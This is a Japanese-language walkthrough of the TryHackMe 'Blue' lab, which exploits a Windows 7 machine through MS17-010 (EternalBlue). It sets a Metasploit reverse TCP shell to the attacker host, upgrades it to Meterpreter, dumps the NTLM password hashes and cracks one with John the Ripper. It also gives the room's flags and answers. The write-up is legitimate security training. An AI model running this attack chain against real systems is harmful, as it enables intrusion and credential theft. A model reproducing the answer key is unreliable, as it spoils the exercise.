概要
TryHackMe「Blue」のWalkthroughです。
Task1
Q1.Scan the machine. (If you are unsure how to tackle this, I recommend checking out the Nmap room)
Hint.Command: nmap -sV -vv --script vuln TARGET_IP
nmapでポートスキャンを実行します。
$ nmap -Pn -sC -A -T4 -sV 10.10.105.172
Starting Nmap 7.94SVN ( https://nmap.org ) at 2024-06-06 02:29 EDT
Nmap scan report for 10.10.105.172
Host is up (0.24s latency).
Not shown: 991 closed tcp ports (conn-refused)
PORT STATE SERVICE VERSION
135/tcp open msrpc Microsoft Windows RPC
139/tcp open netbios-ssn Microsoft Windows netbios-ssn
445/tcp open microsoft-ds Windows 7 Professional 7601 Service Pack 1 microsoft-ds (workgroup: WORKGROUP)
3389/tcp open ssl/ms-wbt-server?
| rdp-ntlm-info:
| Target_Name: JON-PC
| NetBIOS_Domain_Name: JON-PC
| NetBIOS_Computer_Name: JON-PC
| DNS_Domain_Name: Jon-PC
| DNS_Computer_Name: Jon-PC
| Product_Version: 6.1.7601
|_ System_Time: 2024-06-06T06:31:21+00:00
|_ssl-date: 2024-06-06T06:31:27+00:00; +1s from scanner time.
| ssl-cert: Subject: commonName=Jon-PC
| Not valid before: 2024-06-05T06:28:07
|_Not valid after: 2024-12-05T06:28:07
49152/tcp open msrpc Microsoft Windows RPC
49153/tcp open msrpc Microsoft Windows RPC
49154/tcp open msrpc Microsoft Windows RPC
49158/tcp open msrpc Microsoft Windows RPC
49159/tcp open msrpc Microsoft Windows RPC
Service Info: Host: JON-PC; OS: Windows; CPE: cpe:/o:microsoft:windows
Host script results:
|_nbstat: NetBIOS name: JON-PC, NetBIOS user: <unknown>, NetBIOS MAC: 02:1f:a9:9f:52:d1 (unknown)
| smb-os-discovery:
| OS: Windows 7 Professional 7601 Service Pack 1 (Windows 7 Professional 6.1)
| OS CPE: cpe:/o:microsoft:windows_7::sp1:professional
| Computer name: Jon-PC
| NetBIOS computer name: JON-PC\x00
| Workgroup: WORKGROUP\x00
|_ System time: 2024-06-06T01:31:20-05:00
| smb2-time:
| date: 2024-06-06T06:31:20
|_ start_date: 2024-06-06T06:28:05
| smb-security-mode:
| account_used: guest
| authentication_level: user
| challenge_response: supported
|_ message_signing: disabled (dangerous, but default)
|_clock-skew: mean: 1h00m01s, deviation: 2h14m10s, median: 0s
| smb2-security-mode:
| 2:1:0:
|_ Message signing enabled but not required
Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 131.20 seconds
Q2.How many ports are open with a port number under 1000?
Hint.Near the top of the nmap output: PORT STATE SERVICE
ポートスキャンの結果から1000以下のポートは3つ空いていることが分かりました。
A.3
Q3.What is this machine vulnerable to? (Answer in the form of: ms??-???, ex: ms08-067)
Hint.Revealed by the ShadowBrokers, exploits an issue within SMBv1
また、Nmapの--script vulnオプションを使用することでSMBv1の脆弱性で有名なEternalBlueによる悪用が可能だと分かりました。
Host script results:
|_smb-vuln-ms10-061: NT_STATUS_ACCESS_DENIED
|_samba-vuln-cve-2012-1182: NT_STATUS_ACCESS_DENIED
|_smb-vuln-ms10-054: false
| smb-vuln-ms17-010:
| VULNERABLE:
| Remote Code Execution vulnerability in Microsoft SMBv1 servers (ms17-010)
| State: VULNERABLE
| IDs: CVE:CVE-2017-0143
| Risk factor: HIGH
| A critical remote code execution vulnerability exists in Microsoft SMBv1
| servers (ms17-010).
|
| Disclosure date: 2017-03-14
| References:
| https://blogs.technet.microsoft.com/msrc/2017/05/12/customer-guidance-for-wannacrypt-attacks/
| https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-0143
|_ https://technet.microsoft.com/en-us/library/security/ms17-010.aspx
A.MS17-010
Task2
Q1.Start Metasploit
Hint.Command: msfconsole
Metasploitを起動します。
$ msfconsole
Q2.Find the exploitation code we will run against the machine. What is the full path of the code? (Ex: exploit/........)
Hint.search ms??
searchコマンドで検索します。
msf6 > search smbv1
Matching Modules
================
# Name Disclosure Date Rank Check Description
- ---- --------------- ---- ----- -----------
0 exploit/windows/smb/ms17_010_eternalblue 2017-03-14 average Yes MS17-010 EternalBlue SMB Remote Windows Kernel Pool Corruption
1 exploit/windows/smb/smb_rras_erraticgopher 2017-06-13 average Yes Microsoft Windows RRAS Service MIBEntryGet Overflow
Interact with a module by name or index. For example info 1, use 1 or use exploit/windows/smb/smb_rras_erraticgopher
A.exploit/windows/smb/ms17_010_eternalblue
Q3.Show options and set the one required value. What is the name of this value? (All caps for submission)
Hint.Command: show options
useでエクスプロイトを選択します。
msf6 > use exploit/windows/smb/ms17_010_eternalblue
[*] No payload configured, defaulting to windows/x64/meterpreter/reverse_tcp
show optionsで実行に必要なパラメータを表示します。
> show options
Module options (exploit/windows/smb/ms17_010_eternalblue):
Name Current Setting Required Description
---- --------------- -------- -----------
RHOSTS yes The target host(s), see https://docs.metasploit.com/docs/using-metaspl
oit/basics/using-metasploit.html
RPORT 445 yes The target port (TCP)
SMBDomain no (Optional) The Windows domain to use for authentication. Only affects
Windows Server 2008 R2, Windows 7, Windows Embedded Standard 7 target
machines.
SMBPass no (Optional) The password for the specified username
SMBUser no (Optional) The username to authenticate as
VERIFY_ARCH true yes Check if remote architecture matches exploit Target. Only affects Wind
ows Server 2008 R2, Windows 7, Windows Embedded Standard 7 target mach
ines.
VERIFY_TARGET true yes Check if remote OS matches exploit Target. Only affects Windows Server
2008 R2, Windows 7, Windows Embedded Standard 7 target machines.
RHOSTSが必要だと分かりました。
A.RHOSTS
Q4.With that done, run the exploit!
Hint.Command: run (or exploit)
RHOSTSを指定します。
> set RHOSTS 10.10.105.172
RHOSTS => 10.10.105.172
Windowsのリバースシェルコードをセットします。
> set payload windows/x64/shell/reverse_tcp
payload => windows/x64/shell/reverse_tcp
リッスンするIPアドレスとポートを指定します。
今回の場合、ポートはそのままでIPアドレスだけ変更する。
> set LHOST 10.6.55.144
LHOST => 10.6.55.144
runかexploitコマンドでエクスプロイトを実行します。
Q5.Confirm that the exploit has run correctly. You may have to press enter for the DOS shell to appear. Background this shell (CTRL + Z). If this failed, you may have to reboot the target VM. Try running it again before a reboot of the target.
シェルの取得に成功しました。
なお、この脆弱性を悪用する場合は何度も失敗する可能性があります。
適宜ターゲットマシンを再起動するなどしてリトライしてください。
[+] 10.10.133.195:445 - =-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=
[+] 10.10.133.195:445 - =-=-=-=-=-=-=-=-=-=-=-=-=-WIN-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=
[+] 10.10.133.195:445 - =-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=
Shell Banner:
Microsoft Windows [Version 6.1.7601]
-----
C:\Windows\system32>
Task3
Q1.If you haven't already, background the previously gained shell (CTRL + Z). Research online how to convert a shell to meterpreter shell in metasploit. What is the name of the post module we will use? (Exact path, similar to the exploit we previously selected)
Hint.Google this: shell_to_meterpreter
Ctrl+Zでセッションをバックグランドにする。
その後、searchコマンドでmeterpreterを検索する。
> search shell_to_meterpreter
Matching Modules
================
# Name Disclosure Date Rank Check Description
- ---- --------------- ---- ----- -----------
0 post/multi/manage/shell_to_meterpreter normal No Shell to Meterpreter Upgrade
Interact with a module by name or index. For example info 0, use 0 or use post/multi/manage/shell_to_meterpreter
A.post/multi/manage/shell_to_meterpreter
Q2.Select this (use MODULE_PATH). Show options, what option are we required to change?
useでmeterpreterを使用し、必要なオプションを表示します。
> use post/multi/manage/shell_to_meterpreter
msf6 post(multi/manage/shell_to_meterpreter) > show options
Module options (post/multi/manage/shell_to_meterpreter):
Name Current Setting Required Description
---- --------------- -------- -----------
HANDLER true yes Start an exploit/multi/handler to receive the connection
LHOST no IP of host that will receive the connection from the payload (Will try to au
to detect).
LPORT 4433 yes Port for payload to connect to.
SESSION yes The session to run this module on
View the full module info with the info, or info -d command.
SESSIONオプションをセットする必要があると分かりました。
A.SESSION
Q3.Set the required option, you may need to list all of the sessions to find your target here.
Hint.sessions -l
sessions -lでセッションの一覧を表示します。
> sessions -l
Active sessions
===============
Id Name Type Information Connection
-- ---- ---- ----------- ----------
1 shell x64/windows Shell Banner: Microsoft Windows [Version 10.6.55.144:4444 -> 10.10.133.195:49169 (
6.1.7601] ----- 10.10.133.195)
先ほどのセッションのIDが分かりました。
オプションにセットします。
> set SESSION 1
SESSION => 1
Q4.Run! If this doesn't work, try completing the exploit from the previous task once more.
Hint.Command: run (or exploit)
runで実行します。
Q5.Once the meterpreter shell conversion completes, select that session for use.
Hint.sessions SESSION_NUMBER
セッションを確認するとmeterpreterのセッションが貼られているのを確認できます。
msf6 post(multi/manage/shell_to_meterpreter) > sessions -l
Active sessions
===============
Id Name Type Information Connection
-- ---- ---- ----------- ----------
1 shell x64/windows Shell Banner: Microsoft Windows [Versi 10.6.55.144:4444 -> 10.10.119.235:4917
on 6.1.7601] ----- 6 (10.10.119.235)
2 meterpreter x64/windows NT AUTHORITY\SYSTEM @ JON-PC 10.6.55.144:4433 -> 10.10.119.235:4918
0 (10.10.119.235)
セッションを選択します。
> sessions 2
[*] Starting interaction with 2...
meterpreter >
Q6.Verify that we have escalated to NT AUTHORITY\SYSTEM. Run getsystem to confirm this. Feel free to open a dos shell via the command 'shell' and run 'whoami'. This should return that we are indeed system. Background this shell afterwards and select our meterpreter session for usage again.
shellコマンドでWindowsのシェルを開きユーザーを確認します。
> shell
Process 1348 created.
Channel 1 created.
Microsoft Windows [Version 6.1.7601]
Copyright (c) 2009 Microsoft Corporation. All rights reserved.
C:\Windows\system32>whoami
whoami
nt authority\system
確認できたらCtrl+Zで再度バックグラウンドにし、meterpreterに戻ります。
Task4
Q1.Within our elevated meterpreter shell, run the command 'hashdump'. This will dump all of the passwords on the machine as long as we have the correct privileges to do so. What is the name of the non-default user?
hashdumpでパスワードのハッシュ値を取得します。
> hashdump
Administrator:500:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
Guest:501:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
Jon:1000:aad3b435b51404eeaad3b435b51404ee:ffb43f0de35be4d9917ac0cc8ad57f8d:::
Jonというユーザーを発見しました。
A.Jon
Q2.Copy this password hash to a file and research how to crack it. What is the cracked password?
Hint.This password can be found within the rockyou.txt wordlist
Jonのffb43f0de35be4d9917ac0cc8ad57f8d部分がパスワードのハッシュ値になります。
John ther Ripperでハッシュ値を解析します。
$ john blue_hash.txt --wordlist=/usr/share/wordlists/rockyou.txt --format=NT
Using default input encoding: UTF-8
Loaded 1 password hash (NT [MD4 256/256 AVX2 8x3])
Warning: no OpenMP support for this hash type, consider --fork=2
Press 'q' or Ctrl-C to abort, almost any other key for status
alqfna22 (?)
1g 0:00:00:00 DONE (2024-06-06 04:17) 2.325g/s 23721Kp/s 23721Kc/s 23721KC/s alr19882006..alpusidi
Use the "--show --format=NT" options to display all of the cracked passwords reliably
Session completed.
パスワードを特定出来ました。
A.alqfna22
Task5
Q1.Flag1? This flag can be found at the system root.
Hint.Can you C it?
フラグファイルを探します。
> search -f *flag*
Found 6 results...
==================
Path Size (bytes) Modified (UTC)
---- ------------ --------------
c:\Users\Jon\AppData\Roaming\Microsoft\Windows\Recent\flag1.lnk 482 2019-03-17 15:26:42 -0400
c:\Users\Jon\AppData\Roaming\Microsoft\Windows\Recent\flag2.lnk 848 2019-03-17 15:30:04 -0400
c:\Users\Jon\AppData\Roaming\Microsoft\Windows\Recent\flag3.lnk 2344 2019-03-17 15:32:52 -0400
c:\Users\Jon\Documents\flag3.txt 37 2019-03-17 15:26:36 -0400
c:\Windows\System32\config\flag2.txt 34 2019-03-17 15:32:48 -0400
c:\flag1.txt
1~3まで見つかりました。
> cat C:/flag1.txt
flag{access_the_machine}
A.flag{access_the_machine}
Q2.Flag2? This flag can be found at the location where passwords are stored within Windows.
Hint.I wish I wrote down where I kept my password. Luckily it's still stored here on Windows.
> cat C:/Windows/System32/config/flag2.txt
flag{sam_database_elevated_access}
A.flag{sam_database_elevated_access}
Q3.flag3? This flag can be found in an excellent location to loot. After all, Administrators usually have pretty interesting things saved.
Hint.You'll need to have elevated privileges to access this flag.
> cat C:/Users/Jon/Documents/flag3.txt
flag{admin_documents_can_be_valuable}
A.flag{admin_documents_can_be_valuable}